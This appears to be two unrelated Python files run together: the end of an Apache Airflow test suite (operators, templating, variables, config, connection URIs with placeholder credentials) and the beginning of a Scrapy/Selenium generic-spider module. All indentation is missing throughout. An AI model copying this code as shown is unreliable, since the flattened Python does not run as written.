self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
msg = ('Invalid arguments were passed to BashOperator '
       '(task_id: test_illegal_args).')
with conf_vars({('operators', 'allow_illegal_arguments'): 'True'}):
with self.assertWarns(PendingDeprecationWarning) as warning:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
assert any(msg in str(w) for w in warning.warnings)
def test_illegal_args_forbidden(self):
"""
Tests that operators raise exceptions on illegal arguments when
illegal arguments are not allowed.
"""
with self.assertRaises(AirflowException) as ctx:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertIn(
('Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'),
str(ctx.exception))
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command="echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
# Annoying workaround for nonlocal not existing in python 2
data = {'called': False}
def check_failure(context, test_case=self):
data['called'] = True
error = context.get('exception')
test_case.assertIsInstance(error, AirflowException)
t = BashOperator(
task_id='check_on_failure_callback',
bash_command="exit 1",
dag=self.dag,
on_failure_callback=check_failure)
self.assertRaises(
exceptions.AirflowException,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(data['called'])
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject:
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_task_get_template(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
self.assertEqual(context['ds'], '2015-01-01')
self.assertEqual(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEqual(context['next_ds'], '2015-01-02')
self.assertEqual(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEqual(context['prev_ds'], '2014-12-31')
self.assertEqual(context['prev_ds_nodash'], '20141231')
self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEqual(context['ts_nodash'], '20150101T000000')
self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')
self.assertEqual(context['yesterday_ds'], '2014-12-31')
self.assertEqual(context['yesterday_ds_nodash'], '20141231')
self.assertEqual(context['tomorrow_ds'], '2015-01-02')
self.assertEqual(context['tomorrow_ds_nodash'], '20150102')
def test_local_task_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_raise_key_error(self):
with self.assertRaises(KeyError):
Variable.get("thisIdDoesNotExist")
def test_get_non_existing_var_with_none_default_should_return_none(self):
self.assertIsNone(Variable.get("thisIdDoesNotExist", default_var=None))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Happiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Happiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check that both the returned value and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_delete(self):
key = "tested_var_delete"
value = "to be deleted"
# No-op if the variable doesn't exist
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
# Set the variable
Variable.set(key, value)
self.assertEqual(value, Variable.get(key))
# Delete the variable
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
def test_parameterized_config_gen(self):
cfg = parameterized_config(DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(conf.has_option("core", "FERNET_KEY"))
self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = conf.get('core', 'FERNET_KEY')
with conf_vars({('core', 'FERNET_KEY_CMD'): 'printf HELLO'}):
FALLBACK_FERNET_KEY = conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(conf.has_option("core", "FERNET_KEY"))
self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))
with conf_vars({('core', 'fernet_key'): None}):
with self.assertRaises(AirflowConfigException) as cm:
conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
with mock.patch.dict('os.environ', {key: value}):
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
with mock.patch.dict('os.environ', {key: value}):
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_array_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
from airflow.executors.sequential_executor import SequentialExecutor
TI = TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
p_fails = session.query(TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_run_command(self):
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)), '\u1000foo')
self.assertEqual(run_command('echo "foo bar"'), 'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_externally_triggered_dagrun(self):
TI = TaskInstance
# Create the dagrun between two "scheduled" execution dates of the DAG
EXECUTION_DATE = DEFAULT_DATE + timedelta(days=2)
EXECUTION_DS = EXECUTION_DATE.strftime('%Y-%m-%d')
EXECUTION_DS_NODASH = EXECUTION_DS.replace('-', '')
dag = DAG(
TEST_DAG_ID,
default_args=self.args,
schedule_interval=timedelta(weeks=1),
start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_externally_triggered_dag_context',
dag=dag)
dag.create_dagrun(run_id=DagRun.id_for_date(EXECUTION_DATE),
execution_date=EXECUTION_DATE,
state=State.RUNNING,
external_trigger=True)
task.run(
start_date=EXECUTION_DATE, end_date=EXECUTION_DATE)
ti = TI(task=task, execution_date=EXECUTION_DATE)
context = ti.get_template_context()
# next_ds/prev_ds should be the execution date for manually triggered runs
self.assertEqual(context['next_ds'], EXECUTION_DS)
self.assertEqual(context['next_ds_nodash'], EXECUTION_DS_NODASH)
self.assertEqual(context['prev_ds'], EXECUTION_DS)
self.assertEqual(context['prev_ds_nodash'], EXECUTION_DS_NODASH)
class TestConnection(unittest.TestCase):
def setUp(self):
utils.db.initdb()
@mock.patch.dict('os.environ', {
'AIRFLOW_CONN_TEST_URI': 'postgres://username:[email protected]:5432/the_database',
})
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
@mock.patch.dict('os.environ', {
'AIRFLOW_CONN_TEST_URI_NO_CREDS': 'postgres://ec2.compute.com/the_database',
})
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
with mock.patch.dict('os.environ', {
'AIRFLOW_CONN_AIRFLOW_DB': 'postgres://username:[email protected]:5432/the_database',
}):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
@mock.patch.dict('os.environ', {
'AIRFLOW_CONN_TEST_URI': 'postgres://username:[email protected]:5432/the_database',
'AIRFLOW_CONN_TEST_URI_NO_CREDS': 'postgres://ec2.compute.com/the_database',
})
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:[email protected]:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
@mock.patch.dict('os.environ', {
'AIRFLOW_CONN_TEST_URI': 'postgres://username:[email protected]:5432/the_database',
'AIRFLOW_CONN_TEST_URI_NO_CREDS': 'postgres://ec2.compute.com/the_database',
})
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:[email protected]:5432/the_database', str(engine.url))
@mock.patch.dict('os.environ', {
'AIRFLOW_CONN_TEST_URI': 'postgres://username:[email protected]:5432/the_database',
'AIRFLOW_CONN_TEST_URI_NO_CREDS': 'postgres://ec2.compute.com/the_database',
})
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
if __name__ == '__main__':
unittest.main()
|
masterspider.py
|
# -*- encoding: utf-8 -*-
from tornado.log import enable_pretty_logging, LogFormatter, access_log, app_log, gen_log
from tornado.options import options
gen_log.info("--> importing .masterspider")
# import pprint
from pprint import pprint, pformat
import os
import shutil
from urllib2 import unquote, quote
import re
import time
from datetime import datetime
import json
# cf : http://blog.jmoz.co.uk/python-convert-datetime-to-timestamp/
""" # snippet datetime and timestamp
import datetime
readable = datetime.datetime.fromtimestamp(1520437834).isoformat()
print(readable)
# e.g. 2018-03-07T16:50:34 (local time ; fromtimestamp() returns a naive datetime, so isoformat() adds no UTC offset)
"""
### import app settings
# from config.settings_example import APP_PROD
# from config.settings_secret import APP_PROD
from config.settings_scrapy import *
from config.settings_cleaning import *
### LOGGER - SCRAPY
### logging only for scrapy
from os import path, remove
import logging
import logging.config
from logging.config import dictConfig
from config.settings_logging import logging_config
# set logger for scrapy
log_scrap = logging.getLogger("log_scraper")
log_scrap.setLevel(logging.DEBUG)
# Create the Handler for logging data to a file
logger_handler = logging.FileHandler('logs/openscraper_scrapy_logging.log')
logger_handler.setLevel(logging.WARNING)
# Create a Formatter for formatting the log messages
logger_formatter = logging.Formatter('%(name)s - %(levelname)s - %(message)s')
# Add the Formatter to the Handler
logger_handler.setFormatter(logger_formatter)
# Add the Handler to the Logger
log_scrap.addHandler(logger_handler)
log_scrap.debug('>>> Completed configuring log_scraper !')
### import scrapy utilities
import scrapy
from multiprocessing import Process, Queue
from twisted.internet import reactor, defer
from scrapy.http import Request
from scrapy.utils.log import configure_logging
from scrapy.utils.project import get_project_settings
from scrapy.settings import Settings
from scrapy import Spider
from scrapy.crawler import CrawlerProcess, CrawlerRunner
from scrapy.exceptions import CloseSpider
# from scrapy.spiders import SitemapSpider, CrawlSpider
# import scrapy.crawler as crawler
### selenium
# cf : https://stackoverflow.com/questions/30345623/scraping-dynamic-content-using-python-scrapy
# cf : https://stackoverflow.com/questions/17975471/selenium-with-scrapy-for-dynamic-page
# cf : https://github.com/clemfromspace/scrapy-selenium
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
import selenium.webdriver.support.ui as ui
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.select import Select
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
from time import sleep
### cf : https://intoli.com/blog/running-selenium-with-headless-chrome/
### cf : https://duo.com/decipher/driving-headless-chrome-with-python
options_selenium = webdriver.ChromeOptions()
# options.binary_location = '/usr/local/bin/chromedriver'
options_selenium.add_argument('headless')
# options_selenium.add_argument('--incognito')
# set the window size
options_selenium.add_argument('window-size=1200x600')
# initialize the driver
# driver = webdriver.Chrome(chrome_options=options_selenium)
### executable path for chrome driver
# exec_chromedriver = "/usr/local/bin/chromedriver"
### settings scrapy
# s = get_project_settings()
# print "\ndefault settings scrapy : "
# pprint(dict(s))
# update settings from settings_scrapy.py
# s.update(dict(ITEM_PIPELINES={
# 'openscraper.pipelines.RestExportPipeline': 300,
# }))
# print "\nupdated settings scrapy : "
# pprint(dict(s))
### SCRAPY PIPELINES....
# update setting to use the pipeline which will write results (items) in the database or files
# cf self-contained scrapy : https://gist.github.com/alecxe/fc1527d6d9492b59c610
# cf self-contained scrapy : https://github.com/kirankoduru/scrapy-programmatically/
# cf : https://stackoverflow.com/questions/42511814/scrapy-passing-custom-settings-to-spider-from-script-using-crawlerprocess-crawl
### set scrapy from settings_scrapy.py
settings = Settings()
# settings.set( "BOT_NAME" , BOT_NAME )
# settings.set( "USER_AGENT" , USER_AGENT )
# settings.set( "ROBOTSTXT_OBEY" , ROBOTSTXT_OBEY )
# settings.set( "AUTOTHROTTLE_ENABLED" , AUTOTHROTTLE_ENABLED )
# settings.set( "HTTPCACHE_ENABLED" , HTTPCACHE_ENABLED )
# settings.set( "RANDOMIZE_DOWNLOAD_DELAY" , RANDOMIZE_DOWNLOAD_DELAY )
settings.set( "ITEM_PIPELINES" , ITEM_PIPELINES )
settings.set( "DB_DATA_URI" , DB_DATA_URI )
settings.set( "DB_DATA_DATABASE" , DB_DATA_DATABASE )
settings.set( "DB_DATA_COLL_SCRAP" , DB_DATA_COLL_SCRAP )
# settings.set( "RETRY_TIMES" , RETRY_TIMES )
# settings.set( "CONCURRENT_ITEMS" , CONCURRENT_ITEMS )
# settings.set( "CONCURRENT_REQUESTS" , CONCURRENT_REQUESTS )
settings.set( "CONCURRENT_REQUESTS_PER_DOMAIN" , CONCURRENT_REQUESTS_PER_DOMAIN )
settings.set( "REDIRECT_MAX_TIMES" , REDIRECT_MAX_TIMES )
settings.set( "DOWNLOAD_MAXSIZE" , DOWNLOAD_MAXSIZE )
# settings.set( "DEPTH_PRIORITY" , DEPTH_PRIORITY )
# settings.set( "SCHEDULER_DISK_QUEUE" , SCHEDULER_DISK_QUEUE )
# settings.set( "DEPTH_PRIORITY" , SCHEDULER_MEMORY_QUEUE )
log_scrap.debug (">>> settings scrapy : \n %s \n", pformat(dict(settings)) )
# pprint(dict(settings))
log_scrap.debug ("--- run_generic_spider / BOT_NAME : %s", settings.get('BOT_NAME'))
log_scrap.debug ("--- run_generic_spider / USER_AGENT : %s", settings.get('USER_AGENT'))
log_scrap.debug ("--- run_generic_spider / ITEM_PIPELINES : %s \n", settings.get('ITEM_PIPELINES').__dict__)
### import base_fields ###############
### import main args from config.settings_corefields.py
from config.settings_corefields import * # mainly for DATAMODEL_CORE_FIELDS_ITEM
### import items
from items import * # GenericItem #, StackItem #ScrapedItem
### import mixins
# from mixins import GenericSpiderMixin
#####################################################
### define generic spider
### cf : https://blog.scrapinghub.com/2016/02/24/scrapy-tips-from-the-pros-february-2016-edition/
# process = crawler.CrawlerRunner()
### UTILS FOR SPIDERS
# to be used in run_generic_spider function
def flattenSpiderConfig(run_spider_config) :
"""creates a flat dict from nested spider_config dict"""
spider_config_flat = {}
for conf_class, conf_set in run_spider_config.iteritems() :
if conf_class != "_id" :
for conf_field, conf_data in conf_set.iteritems() :
spider_config_flat[conf_field] = conf_data
return spider_config_flat
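# minimal illustration (hypothetical config keys/values) of what flattenSpiderConfig does :
# flattenSpiderConfig({ "_id" : "abc123", "scrapy" : {"LIMIT_PAGES" : 5}, "selenium" : {"parse_reactive" : False} })
# --> { "LIMIT_PAGES" : 5, "parse_reactive" : False }
# the "_id" entry is skipped and every other nested dict is merged into one flat dict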
def clean_xpath_for_reactive(xpath_str, strings_to_clean) :
""" clean a string given a list of words/strings """
for i in strings_to_clean :
xpath_str = xpath_str.replace(i, '')
# drop a trailing slash left over after stripping the suffixes
if xpath_str and xpath_str[-1] == '/' :
    xpath_str = xpath_str[:-1]
return xpath_str
def get_dictvalue_from_xpath(full_dict, path_string):
""" get a value in a dict given a path's string """
key_value = full_dict
for i in path_string.split('/')[1:] :
key_value = key_value[i]
return key_value
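# quick illustrations (hypothetical values) of the two helpers above :
# clean_xpath_for_reactive('.//h3/a/@href', ['/@src', '/@href', '/text()'])
# --> './/h3/a' (suffix removed so the xpath returns an element node usable by Selenium)
# get_dictvalue_from_xpath({"data" : {"results" : [1, 2]}}, "/data/results")
# --> [1, 2] (the path string is walked over nested dict keys, skipping the leading '/')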
def scroll_down(driver, scroll_pause_time, max_loops=3) :
"""
scroll down a page with selenium
cf : https://stackoverflow.com/questions/20986631/how-can-i-scroll-a-web-page-using-selenium-webdriver-in-python
"""
log_scrap.info("--- scroll_down --- START ..." )
log_scrap.info("--- scroll_down / scroll_pause_time : %s ", scroll_pause_time )
log_scrap.info("--- scroll_down / max_loops : %s ", max_loops )
loop_number = 0
needs_scroll = True
# while True:
while loop_number <= max_loops and needs_scroll :
log_scrap.info("--- scroll_down --- STARTING LOOPS..." )
# Get scroll height
### This is the difference. Moving this *inside* the loop
### means that it checks if scrollTo is still scrolling
last_height = driver.execute_script("return document.body.scrollHeight")
log_scrap.info("--- scroll_down / last_height : %s", last_height )
# Scroll down to bottom
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
log_scrap.info("--- scroll_down --- scrollTo /1..." )
# Wait to load page
time.sleep(scroll_pause_time)
# Calculate new scroll height and compare with last scroll height
new_height = driver.execute_script("return document.body.scrollHeight")
log_scrap.info("--- scroll_down / new_height : %s", new_height )
if new_height == last_height:
# try again (can be removed)
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
# Wait to load page
time.sleep(scroll_pause_time)
# Calculate new scroll height and compare with last scroll height
new_height = driver.execute_script("return document.body.scrollHeight")
log_scrap.info("--- scroll_down / new_height : %s", new_height )
# check if the page height has remained the same
# if new_height == last_height or loop_number >= max_loops :
if new_height == last_height :
# if so, you are done
needs_scroll = False
break
# if not, move on to the next loop
else:
last_height = new_height
loop_number += 1
continue
log_scrap.info("--- scroll_down --- END ..." )
return driver
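# typical call (see the Selenium branch of GenericSpider.parse below) :
# self.driver = scroll_down(self.driver, scroll_pause_time, max_loops)
# the driver is returned so the caller keeps working on the same, fully scrolled page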
# to be used in GenericSpider class
'''
def dictFromDataModelList (datamodel_list ) :
"""creates a correspondance dict from datamodel to _xpath """
# data_model_dict = { i : "{}_xpath".format(i) for i in datamodel_list }
data_model_dict = { str(i["_id"]) : i for i in datamodel_list }
return data_model_dict
'''
### ON ITEMS AND PIPELINES SEE : https://gist.github.com/alecxe/fc1527d6d9492b59c610
# class GenericSpiderUtils(Spider):
# """a generic spider utils class to contain all parsing functions"""
# ### spider class needs a default name
# name = "genericspiderutils"
# def __init__(self, user_id=None, datamodel=None, spider_id=None, spider_config_flat=None, *args, **kwargs) :
# ### super init/override spider class with current args
# log_scrap.info("--- GenericSpider / __init__ :")
# super(GenericSpider, self).__init__(*args, **kwargs)
### + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + ###
### GENERIC SPIDER #########################################################################
### + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + ###
### note : to stop process cf : https://stackoverflow.com/questions/19071512/socket-error-errno-48-address-already-in-use
class GenericSpider(Spider) :
"""a generic spider to be configured with datamodel and spider_config_flat variables"""
### spider class needs a default name
name = "genericspider"
def __init__(self, user_id = None,
datamodel = None,
spider_id = None,
spider_config_flat = None,
test_limit = None,
*args, **kwargs
) :
print ("\n\n{}\n".format("> > > "*20))
### super init/override spider class with current args
log_scrap.info("--- GenericSpider / __init__ :")
super(GenericSpider, self).__init__(*args, **kwargs)
self.user_id = user_id
self.spider_id = spider_id
self.test_limit = test_limit
log_scrap.info("--- GenericSpider / test_limit : %s ", self.test_limit )
self.item_count = 0
self.page_count = 1
# self.there_is_more_items_to_scrap = True
self.there_is_more_items_to_scrap_dict = {}
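# pagination flags keyed by start_url : an entry is set to True in start_requests()
# and flipped to False once that start_url has no more pages/items to scrap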
### store spider_config_flat
